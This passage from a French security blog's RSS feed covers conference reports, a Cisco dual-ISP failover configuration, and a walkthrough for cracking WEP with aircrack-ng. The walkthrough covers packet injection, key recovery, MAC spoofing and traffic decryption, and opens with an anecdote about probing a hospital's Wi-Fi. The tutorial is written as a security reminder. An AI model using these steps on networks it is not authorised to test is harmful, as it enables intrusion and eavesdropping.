<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%232+%26+%233+http://ye5rg.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%232+%26+%233+http://ye5rg.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/conference/deepsec-day-2-3-697/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>DeepSec Day #1</title>
		<link>http://www.kaizeronion.com/security/deepsec-day-1-676/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=deepsec-day-1</link>
		<comments>http://www.kaizeronion.com/security/deepsec-day-1-676/#comments</comments>
		<pubDate>Wed, 18 Nov 2009 00:32:36 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[DeepSec]]></category>
		<category><![CDATA[Shreeraj Shah]]></category>
		<category><![CDATA[Vienna]]></category>
		<category><![CDATA[Vienne]]></category>
		<category><![CDATA[Vimal Patel]]></category>
		<category><![CDATA[Wien]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=676</guid>
		<description><![CDATA[Je suis actuellement à la conférence Autrichienne DeepSec à Vienne. Elle se déroule sur quatre jours dont les deux premiers jours sont dédiés aux Workshops. C&#8217;est ma première édition et je dois dire que je ne suis pas déçu. D&#8217;une part le cadre est fort agréable (la conférence s&#8217;est établie dans l&#8217;hôtel The Imperial Riding [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Je suis actuellement à la conférence Autrichienne <a href="http://www.deepsec.net">DeepSec</a> à Vienne. Elle se déroule sur quatre jours dont les deux premiers jours sont dédiés aux Workshops. C&#8217;est ma première édition et je dois dire que je ne suis pas déçu. D&#8217;une part le cadre est fort agréable (la conférence s&#8217;est établie dans l&#8217;hôtel  <a href="http://www.marriott.com/hotels/travel/viese?groupCode=tg6tg6a&amp;app=resvlink&amp;fromDate=11/14/09&amp;toDate=11/21/09">The Imperial Riding School Vienna</a>), et d&#8217;autre part notre première journée c&#8217;est agréablement bien passée.</p>
<p style="text-align: justify;">Concernant les Workshops, ce n&#8217;est pas moins de huit training qui sont proposés. Pour ma part j&#8217;ai suivi le workshop Web 2.0 Security &#8211; Advanced Attacks and Defense présenté par Vimal Patel &amp; Prashant Thakar (Blueinfy Solutions Pvt. Ltd.). Les deux indiens connaissent bien le sujet et leur présentation est rodée. Les travaux pratiques sur le protocole <a href="http://fr.wikipedia.org/wiki/Action_Message_Format">AMF</a> pour les applications <a href="http://fr.wikipedia.org/wiki/Adobe_Flex">Flex</a> sont prometteurs, nous verront ça demain. Pour le reste, la plus part du temps, le contenu a pris des airs de refrain, mais la soirée fut très original.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/094.JPG"><img class="aligncenter size-medium wp-image-683" title="shnitzel" src="http://www.kaizeronion.com/wp-content/uploads/094-225x300.jpg" alt="shnitzel" width="225" height="300" /></a></center></p>
<p style="text-align: justify;">Après une petit heure de piscine, nous avons été manger la célèbre <a href="http://fr.wikipedia.org/wiki/Cuisine_autrichienne#Schnitzel_.28escalope.29">Wiener Shnitzel</a> dans un petit restaurant du centre. Accompagné d&#8217;un des organisateurs de la conférence, nous avons eu droit a une visite guidé quelque peu spéciale. En effet, nous nous sommes rendu dans le quartier 21 ou se loge une organisation connu sous le nom de <a href="http://bigbrotherawards.at/2009/Hauptseite">quintessenz</a> qui lutte pour la restauration des droits civils en termes d&#8217;informatique.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/096.JPG"><img class="aligncenter size-medium wp-image-684" title="quartier21" src="http://www.kaizeronion.com/wp-content/uploads/096-300x225.jpg" alt="quartier21" width="300" height="225" /></a></center></p>
<p>Ils décernent chaque 25 Octobre des Big Brother Awards à chaque organisation, société qui ne respectent pas les droits civils et la vie privée des gens. Autant vous le dire tout de suite ce sont des passionnés qui ne comptent pas leurs heures.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/097.JPG"><img class="aligncenter size-medium wp-image-685" title="metalab" src="http://www.kaizeronion.com/wp-content/uploads/097-300x225.jpg" alt="metalab" width="300" height="225" /></a></center></p>
<p style="text-align: justify;">Autre endroit, autre style, nous nous sommes rendu dans un <a href="http://hackerspaces.org/wiki/">Hackerspaces</a>. Nous avons eu le droit à un petit tour du propriétaire et surtout à une démonstration de la découpeuse au Laser. Ce lieu appelé le club-metalab, regorge d&#8217;appareil fait maison. Que ce soit un mur de verre illuminé programmable via une interface web, ou encore une mallette contenant trois hot spot wifi disséqués et inter connectés, ce ne sont pas les idées qui manquent. Les installations ont un style un peu underground assumé. Chaque personne que nous avons croisé avait une bouteille de Club-Mate à la main, un breuvage qui apparemment les maintiens en éveille. Notre petit groupe de visiteur nocturne était bien content de rentrer après cette escapade.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/103.JPG"><img class="aligncenter size-medium wp-image-686" title="deepsec" src="http://www.kaizeronion.com/wp-content/uploads/103-300x225.jpg" alt="deepsec" width="300" height="225" /></a></center></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%231+http://5wryw.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%231+http://5wryw.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/deepsec-day-1-676/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cisco multiple ISP avec IP SLA</title>
		<link>http://www.kaizeronion.com/security/cisco-multiple-isp-avec-ip-sla-616/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=cisco-multiple-isp-avec-ip-sla</link>
		<comments>http://www.kaizeronion.com/security/cisco-multiple-isp-avec-ip-sla-616/#comments</comments>
		<pubDate>Wed, 21 Oct 2009 08:15:45 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[3845]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Dual ISP]]></category>
		<category><![CDATA[IP SLA]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[Routeur]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=616</guid>
		<description><![CDATA[Récemment j&#8217;ai été confronté à un problème de configuration sur un routeur Cisco 3845. L&#8217;objectif était simple, il fallait configurer du failover sur le routeur entre deux provider. D&#8217;un côté une ligne louée et de l&#8217;autre une connexion ADSL négociée à partir du routeur. Si l&#8217;énoncé semble simple, le résultat n&#8217;est pas pour autant évident [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Récemment j&#8217;ai été confronté à un problème de configuration sur un routeur Cisco 3845. L&#8217;objectif était simple, il fallait configurer du <a href="http://fr.wikipedia.org/wiki/Basculement_%28informatique%29">failover</a> sur le routeur entre deux provider. D&#8217;un côté une ligne louée et de l&#8217;autre une connexion ADSL négociée à partir du routeur. Si l&#8217;énoncé semble simple, le résultat n&#8217;est pas pour autant évident (surtout pour un expert Cisco comme moi).</p>
<p style="text-align: justify;">Le premier requis est d&#8217;avoir la bonne version d&#8217;IOS installé, en l&#8217;occurrence la fonctionnalité <em>ip sla</em> est disponible à partir de l&#8217;IOS 12.4 avec le feature set <strong><em>advanced IP services</em></strong> ou <strong><em>advanced security</em></strong>. Pour rappel, vous trouverez la procédure pour mettre à jour un IOS Cisco <a href="http://www.cisco.com/en/US/products/hw/routers/ps259/products_tech_note09186a00801fc986.shtml">ici</a>. Voici un petit schéma qui reprends l&#8217;énoncé précédent.</p>
<div id="attachment_618" class="wp-caption aligncenter" style="width: 610px"><a href="http://www.kaizeronion.com/wp-content/uploads/multiple-isp.jpg"><img class="size-full wp-image-618" title="multiple-isp" src="http://www.kaizeronion.com/wp-content/uploads/multiple-isp.jpg" alt="Cisco IP SLA" width="600" height="120" /></a><p class="wp-caption-text">Cisco IP SLA</p></div>
<p>Voici la configuration nécessaire au bon fonctionnement de votre loadbalancing :</p>
<div class="codesample">
hostname Router_Name<br />
!<br />
ip cef<br />
!<br />
!#### Définir les objets de tracking. Ces objets sont utilisés pour ####!<br />
!#### vérifier la disponibilité d&#8217;un host sur chaque ISP ####!<br />
!<br />
ip sla 1<br />
icmp-echo 1.1.1.2 source-ip 1.1.1.1<br />
frequency 30<br />
ip sla schedule 1 start-time now life forever<br />
!<br />
ip sla 2<br />
icmp-echo 2.2.2.3 source-ip 2.2.2.2<br />
frequency 30<br />
ip sla schedule 2 start-time now life forever<br />
!<br />
!#### Configurer les objets de tracking (cf. IP SLA) ####!<br />
!<br />
track 101 rtr 1 reachability<br />
track 102 rtr 2 reachability<br />
!<br />
!#### Configuration des différentes interfaces ####!<br />
!<br />
interface GigabitEthernet0/0<br />
description Internal connection<br />
ip address 192.168.1.1 255.255.255.0<br />
no ip redirects<br />
no ip unreachables<br />
no ip proxy-arp<br />
ip flow ingress<br />
ip nat inside<br />
ip virtual-reassembly<br />
duplex auto<br />
speed auto<br />
media-type rj45<br />
no mop enabled<br />
!<br />
interface GigabitEthernet0/1<br />
description ADSL connection<br />
no ip address<br />
no ip redirects<br />
no ip unreachables<br />
no ip proxy-arp<br />
ip flow ingress<br />
duplex auto<br />
speed auto<br />
media-type rj45<br />
pppoe enable<br />
pppoe-client dial-pool-number 1<br />
no mop enabled<br />
!<br />
interface FastEthernet0/1/0<br />
switchport access vlan 3<br />
!<br />
interface FastEthernet0/1/1<br />
!<br />
interface FastEthernet0/1/2<br />
!<br />
interface FastEthernet0/1/3<br />
!<br />
interface Vlan3<br />
description Lease Line<br />
ip address 1.1.1.1 255.255.255.248<br />
ip nat outside<br />
ip virtual-reassembly<br />
!<br />
interface Dialer0<br />
ip address negotiated<br />
no ip redirects<br />
no ip unreachables<br />
no ip proxy-arp<br />
ip mtu 1492<br />
ip flow ingress<br />
ip nat outside<br />
ip virtual-reassembly<br />
encapsulation ppp<br />
ip tcp adjust-mss 1412<br />
dialer pool 1<br />
dialer-group 1<br />
ppp authentication pap callin<br />
ppp pap sent-username user password 5 5s454f654r64v4br5t4bvr4<br />
!<br />
!#### Définition des routes en fonction des objets de tracking ####!<br />
!#### dans notre, nous avons une configuration de load balancing ####!<br />
!#### mais on pourrait définir une priorité sur une route pour éviter le loadbalancing ####!<br />
!<br />
ip route 0.0.0.0 0.0.0.0 vlan3 track 101<br />
ip route 0.0.0.0 0.0.0.0 dialer0 track 102<br />
!<br />
!#### Configurer le NAT pour le trafic entrant ####!<br />
!<br />
ip nat inside source route-map ISP1 interface vlan3 overload<br />
ip nat inside source route-map ISP2 interface dialer0 overload<br />
!<br />
!#### Configuration du NAT pour du traffic VPN entrant ####!<br />
!<br />
ip nat inside source static udp 192.168.1.1 500 1.1.1.1 500 route-map ISP1 extendable<br />
ip nat inside source static udp 192.168.1.1 500 2.2.2.2 500 route-map ISP2 extendable<br />
ip nat inside source static 192.168.1.1 1.1.1.1 route-map ISP1 extendable<br />
ip nat inside source static 192.168.1.1 2.2.2.2 route-map ISP2 extendable<br />
!<br />
!#### Configuration des route maps en référence à la configuration du NAT ####!<br />
!<br />
route-map ISP1 permit 100<br />
match interface vlan3<br />
!<br />
route-map ISP2 permit 100<br />
match interface dialer0<br />
!</div>
<p><em><strong>Sources</strong></em> :<br />
<a href="http://www.blindhog.net/cisco-dual-internet-connections-without-bgp/">http://www.blindhog.net/cisco-dual-internet-connections-without-bgp</a><br />
<a href="http://hypergressive.blogspot.com/2009/03/dual-isp-load-balancing-configuration.html">http://hypergressive.blogspot.com/2009/03/dual-isp-load-balancing-configuration.html</a></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Cisco+multiple+ISP+avec+IP+SLA+http://arywp.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Cisco+multiple+ISP+avec+IP+SLA+http://arywp.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/cisco-multiple-isp-avec-ip-sla-616/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack.lu, la defcon Luxembourgeoise</title>
		<link>http://www.kaizeronion.com/security/hack-lu-la-defcon-luxembourgeoise-562/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=hack-lu-la-defcon-luxembourgeoise</link>
		<comments>http://www.kaizeronion.com/security/hack-lu-la-defcon-luxembourgeoise-562/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 19:12:42 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[hack.lu]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=562</guid>
		<description><![CDATA[Comme chaque année en octobre, c&#8217;est la grande messe de la sécurité informatique qui se déroule le 28-30 Octobre à Luxembourg. Pour la deuxième année consécutive, dartalis (mon employeur) sponsorise l&#8217;événement. Cette année s&#8217;annonce être un bon cru au vu des speakers retenus par les membres de l&#8217;association. Pour en citer quelques uns, il y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Comme chaque année en octobre, c&#8217;est la grande messe de la sécurité informatique qui se déroule le 28-30 Octobre à Luxembourg. Pour la deuxième année consécutive, <a href="http://www.dartalis.lu/">dartalis</a> (mon employeur) sponsorise l&#8217;événement.<br />
Cette année s&#8217;annonce être un bon cru au vu des speakers retenus par les membres de l&#8217;association. Pour en citer quelques uns, il y aura <a href="http://www.msuiche.net/">Matt Suiche</a> avec une présentation intéressante de son outil win32dd qui permet de faire un dump de la mémoire physique de votre windows vista.  Il y aura aussi le duo Daniele Bianco et Andrea Barisani avec leur présentation sur l&#8217;émanation d&#8217;ondes des claviers. Notons également la présence de <a href="http://saumil.net/">Saumil Shah</a> qui l&#8217;année passée avait fait une superbe présentation sur la sécurité des navigateurs web. Le premier jour de la conférence sera dédié aux Workshops, avec deux sessions simultanées. La première, Bypassing the Perimeter: Client Side Exploitation sera présenté par Nitesh Dhanjani et Billy K Rios, et la seconde parlera de DAVIX Visualisation et sera présenté par Jan P. Monsch.<br />
Maintenant le mieux pour se faire un avis c&#8217;est d&#8217;y participer, alors rdv là bas !! En attendant vous pouvez suivre les news sur leur site web : <a href="http://www.hack.lu">hack.lu</a> ou comme moi sur <a href="http://twitter.com/hack_lu">twitter</a></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Hack.lu%2C+la+defcon+Luxembourgeoise+http://68eey.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Hack.lu%2C+la+defcon+Luxembourgeoise+http://68eey.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/hack-lu-la-defcon-luxembourgeoise-562/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Twitter was down</title>
		<link>http://www.kaizeronion.com/security/twitter-was-down-532/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=twitter-was-down</link>
		<comments>http://www.kaizeronion.com/security/twitter-was-down-532/#comments</comments>
		<pubDate>Fri, 07 Aug 2009 15:38:12 +0000</pubDate>
		<dc:creator>mathias</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[Déni de service]]></category>
		<category><![CDATA[DoS]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=532</guid>
		<description><![CDATA[La fin du monde est arrivée, 64 ans après l&#8217;explosion de la première bombe atomique. Il semblerait qu&#8217;un groupe de pirate a effectué un DoS (Deni of Service) sur les serveurs de Twitter. Je dois avouer que hier je me suis senti un peu coupé du monde. Comment partager aussi rapidement et massivement mes dernières [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">La fin du monde est arrivée, 64 ans après l&#8217;explosion de la première bombe atomique. Il semblerait qu&#8217;un groupe de pirate a effectué un DoS (Deni of Service) sur les serveurs de Twitter. Je dois avouer que hier je me suis senti un peu coupé du monde. Comment partager aussi rapidement et massivement mes dernières infos, impressions, humeurs avec le monde. La seule fonctionnalité non touché par l&#8217;attaque était <a href="http://search.twitter.com/search?q=twitter+down">Twitter search</a>. Ceci dit, cela nous a permis d&#8217;être spectateur de l&#8217;attaque sans pour autant pouvoir agir. A croire que cela était fait exprès, digne du <a href="http://fr.wikipedia.org/wiki/Marquis_de_Sade">Marquis de Sade</a>.</p>
<p>Je me suis dit qu&#8217;il pouvait être utile d&#8217;avoir un plan de secours des activités possible lorsque Twitter n&#8217;est plus là :<br />
0. Travailler<br />
1. Discuter à propos de Twitter sur FriendFeed<br />
2. Discuter à propos de Twitter sur Facebook<br />
3. Discuter à propos de Twitter sur MSN<br />
4. Laisser un commentaire sur un blog au sujet de Twitter<br />
5. Discuter de Twitter via SMS<br />
6. Discuter de Twitter via Mail<br />
7. Ecrire un article sur Twitter<br />
8. Penser à propos de Twitter<br />
9. Rêver aux prochains tweets que vous allez poster<br />
10. Sortir dehors</p>
<p>Si vous avez d&#8217;autres idées, n&#8217;hésitez pas.</p>
<p>Mise à jour le 08/08/2009 10:27</p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Twitter+was+down+http://i8sma.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Twitter+was+down+http://i8sma.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/twitter-was-down-532/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Wifi / Hara-kiri (Seppuku)</title>
		<link>http://www.kaizeronion.com/security/wifi-hara-kiri-seppuku-481/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=wifi-hara-kiri-seppuku</link>
		<comments>http://www.kaizeronion.com/security/wifi-hara-kiri-seppuku-481/#comments</comments>
		<pubDate>Sat, 04 Jul 2009 05:03:30 +0000</pubDate>
		<dc:creator>mathias</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Crack WEP]]></category>
		<category><![CDATA[TKIP]]></category>
		<category><![CDATA[Wifi]]></category>
		<category><![CDATA[Wireless]]></category>
		<category><![CDATA[WPA]]></category>
		<category><![CDATA[WPA2]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=481</guid>
		<description><![CDATA[Cette semaine j&#8217;ai été surpris d&#8217;apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m&#8217;a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à la connexion de ce réseau&#8230; Alors je me suis [...]]]></description>
			<content:encoded><![CDATA[<p>Cette semaine j&#8217;ai été surpris d&#8217;apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m&#8217;a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à la connexion de ce réseau&#8230; Alors je me suis dit qu&#8217;un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d&#8217;éviter l&#8217;hara-kiri.</p>
<p>Actuellement nous avons les différents types d&#8217;authentification suivants :</p>
<ul>
<li>WEP Open ou Shared Key</li>
<li>WPA PSK avec encryption TKIP ou AES</li>
<li>WPA Enterprise avec encryption TKIP ou AES</li>
<li>WPA2 PSK avec encryption TKIP ou AES</li>
<li>WPA2 Enterprise avec encryption TKIP ou AES</li>
<li>802.1x</li>
</ul>
<p>Sur ces différents modes d&#8217;authentification, il y a bien entendu le <a href="http://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy">WEP</a> qui est complètement obsolète, et le protocole d&#8217;encryption <a href="http://en.wikipedia.org/wiki/Temporal_Key_Integrity_Protocol">TKIP</a> qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.<br />
Je ne vais pas refaire une biographie complète du <a href="http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy">WEP</a> car il en existe déjà beaucoup sur internet. Mais je vais vous montrer (à nouveau car pour certain ce n&#8217;est pas clair visiblement) comment il est facile de casser une clé WEP.</p>
<p>Personnellement j&#8217;utilise le live CD <a href="http://www.remote-exploit.org/backtrack_download.html">backtrack 4</a> qui contient tous les outils nécessaires pour notre démo.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/bt4_logo.jpg"><img alt="" src="http://www.kaizeronion.com/wp-content/uploads/bt4_logo.jpg" title="BackTrack 4" class="alignnone" width="564" height="261" /></a></center></p>
<p>Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :</p>
<ul>
<li>MAC adresse du point d&#8217;accès cible : 00:CA:FE:BA:BE:FF</li>
<li>MAC adresse du client connecté sur le point d&#8217;accès : 00:BA:BE:CA:FE:FF</li>
<li>BSSID du point d&#8217;accès cible : POVWEP</li>
<p>Dans un premier temps, je mets ma carte wifi en mode monitor :</p>
<div class="codesample">airmon-ng start wlan0</div>
<p>Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d&#8217;utilisation. </p>
<div class="codesample">Usage: airodump-ng<br />
<options> <interface></div>
<p>Airodump-ng offre une multitude d&#8217;options et de filtres afin de cibler ce que l&#8217;on souhaite surveiller. </p>
<p>Options airodump-ng:</p>
<p>-w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.<br />
Exemple: airodump-ng -w out wlan0</p>
<p>&#8211;encrypt permet de filtrer les réseaux en fonction du type d&#8217;encryption utilisé.<br />
Exemple: airodump-ng &#8211;encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)</p>
<p>-c permet de cibler l&#8217;écoute sur un canal wifi particulier.<br />
Exemple: airodump-ng -c 10 wlan0 (airodump-ng n&#8217;écoutera que le canal 10)</p>
<p>&#8211;bssid permet de ne cibler qu&#8217;un seul point d&#8217;accès en fonction de son adresse mac.<br />
Exemple: airodump-ng &#8211;bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d&#8217;accès dont l&#8217;adresse mac est 00:CA:FE:BA:BE:3F)</p>
<p>Donc si je veux faire un tour d&#8217;horizon ce que qui ce passe dans le coin, je lance :</p>
<div class="codesample">airodump-ng wlan0</div>
<p>Je peux apercevoir que le point d&#8217;accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).</p>
<div class="codesample">airodump-ng -w out -c 10 &#8211;bssid 00:CA:FE:BA:BE:FF wlan0</div>
<p>Maintenant que nous sommes focalisé sur notre point d&#8217;accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d&#8217;accès avec aireplay :</p>
<div class="codesample">aireplay-ng<br />
<options> <replay interface></div>
<p>Voici les différentes options de aireplay :</p>
<p>&#8211;deauth count : deauthenticate 1 or all stations (-0)<br />
&#8211;fakeauth delay : fake authentication with AP (-1)<br />
&#8211;interactive : interactive frame selection (-2)<br />
&#8211;arpreplay : standard ARP-request replay (-3)<br />
&#8211;chopchop : decrypt/chopchop WEP packet (-4)<br />
&#8211;fragment : generates valid keystream (-5)<br />
&#8211;caffe-latte : query a client for new IVs (-6)<br />
&#8211;cfrag : fragments against a client (-7)<br />
&#8211;test : tests injection and quality (-9)</p>
<p>On utilise l&#8217;option -1 fakeauth (association &#038; authentification) pour notre test :</p>
<div class="codesample">aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0</div>
<p>POVWEP: essid (nom du réseau wifi)</p>
<p>00:CA:FE:BA:BE:FF: adresse mac du point d&#8217;accès</p>
<p>00:BA:BE:CA:FE:FF: adresse mac du client (&#8220;station&#8221; sous airodump-ng)</p>
<p>wlan0: notre interface wifi</p>
<p>Maintenant nous pouvons lancer notre attaque par rejeux d&#8217;ARP (injection de paquets). On utilise l&#8217;option -3 standard ARP-request replay (rejeu d&#8217;arp) :</p>
<div class="codesample">aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0</div>
<p>POVWEP: essid (nom du réseau wifi)</p>
<p>00:CA:FE:BA:BE:FF: adresse mac du point d&#8217;accès</p>
<p>00:BA:BE:CA:FE:FF: adresse mac du client (&#8220;station&#8221; sous airodump-ng)</p>
<p>600: nombre de paquets par secondes qui seront injectés (à régler en fonction de la qualité du signal wifi)</p>
<p>out-01.cap: notre fichier de capture airodump-ng</p>
<p>wlan0: notre interface wifi</p>
<p>Il ne reste plus qu&#8217;attendre afin d&#8217;obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu&#8217;à décrypter la clé à l&#8217;aide de aircrack.</p>
<p>Aircrack-ng est très simple d&#8217;utilisation. </p>
<div class="codesample">usage: aircrack-ng [options] <.cap / .ivs file(s)></div>
<p>Dans notre cas, nous allons utiliser la commande suivante :</p>
<div class="codesample">aircrack-ng out-01.cap</div>
<p>Quelques minutes après vous pourrez voir  :</p>
<div class="codesample">KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]</div>
<p>Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà un mac adresse de disponible, utilisez là : </p>
<div class="codesample">ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF</div>
<p>Et si le service DHCP n&#8217;est pas activé, vous pouvez utiliser wireshark afin de définir l&#8217;adressage du réseau. Commencez par lancer wireshark.<br />
Puis configurer wireshark pour qu&#8217;il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.</p>
<p>Allez dans <strong>Edit\preferences\protocols\IEEE 802.11</strong><br />
puis entrer la clé WEP<br />
Cochez <strong>Assume packets have FCS</strong> et <strong>enable decryption</strong></p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/Screenshot-Wireshark-Preferences.png"><img src="http://www.kaizeronion.com/wp-content/uploads/Screenshot-Wireshark-Preferences-300x161.png" alt="Screenshot-Wireshark: Preferences" title="Screenshot-Wireshark: Preferences" width="300" height="161" class="aligncenter size-medium wp-image-514" /></a></center></p>
<p>Vous pouvez commencer à sniffer en allant dans <strong>capture\options</strong></p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/Screenshot-Wireshark-Capture-Options.png"><img src="http://www.kaizeronion.com/wp-content/uploads/Screenshot-Wireshark-Capture-Options-300x274.png" alt="Screenshot-Wireshark: Capture Options" title="Screenshot-Wireshark: Capture Options" width="300" height="274" class="aligncenter size-medium wp-image-513" /></a></center></p>
<p>Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d&#8217;accès :</p>
<div class="codesample">(wlan.bssid==00:CA:FE:BA:BE:FF) &#038;&#038; (tcp)</div>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/Screenshot-The-Wireshark-Network-Analyzer.png"><img src="http://www.kaizeronion.com/wp-content/uploads/Screenshot-The-Wireshark-Network-Analyzer-300x220.png" alt="Screenshot-The Wireshark Network Analyzer" title="Screenshot-The Wireshark Network Analyzer" width="300" height="220"></a></center></p>
<p>Vous allez découvrir des choses intéressantes. </p>
<p>Deux formules à retenir (dont une que j&#8217;empreinte à <a href="http://sid.rstack.org/blog/index.php/330-wpa-psktkip">sid</a>) :</p>
<div class="codesample">WPA != PSK + TKIP <br /> WIFI != WEP</div>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Wifi+%2F+Hara-kiri+%28Seppuku%29+http://46nom.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Wifi+%2F+Hara-kiri+%28Seppuku%29+http://46nom.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/wifi-hara-kiri-seppuku-481/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
